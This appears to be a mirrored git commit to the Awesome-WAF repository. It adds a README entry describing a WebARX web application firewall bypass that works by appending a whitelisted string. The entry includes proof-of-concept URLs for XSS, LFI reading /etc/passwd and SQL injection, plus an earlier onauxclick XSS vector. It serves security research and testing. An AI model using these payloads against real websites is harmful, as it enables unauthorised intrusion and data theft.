mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-22 23:33:27 +07:00
Update for more WebARX Bypasses
This commit is contained in:
commit
1d0dd372e7
14
README.md
14
README.md
@ -3722,6 +3722,20 @@ http://host.com/test.asp?file=.%./bla.txt
|
|||||||
```
|
```
|
||||||
<a69/onauxclick=open()>rightclickhere
|
<a69/onauxclick=open()>rightclickhere
|
||||||
```
|
```
|
||||||
|
- [Bypassing All Protections Using A Whitelist String](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/) by [@Osanda Malith](https://twitter.com/OsandaMalith)
|
||||||
|
|
||||||
|
- XSS PoC
|
||||||
|
```
|
||||||
|
http://host.com/?vulnparam=<script>alert()</script>&ithemes-sync-request
|
||||||
|
```
|
||||||
|
- LFI PoC
|
||||||
|
```
|
||||||
|
http://host.com/?vulnparam=../../../../../etc/passwd&ithemes-sync-request
|
||||||
|
```
|
||||||
|
- SQLi PoC
|
||||||
|
```
|
||||||
|
http://host.com/?vulnparam=1%20unionselect%20@@version,2--&ithemes-sync-request
|
||||||
|
```
|
||||||
|
|
||||||
### WebKnight
|
### WebKnight
|
||||||
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
|
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
|
||||||
|
Loading…
Reference in New Issue
Block a user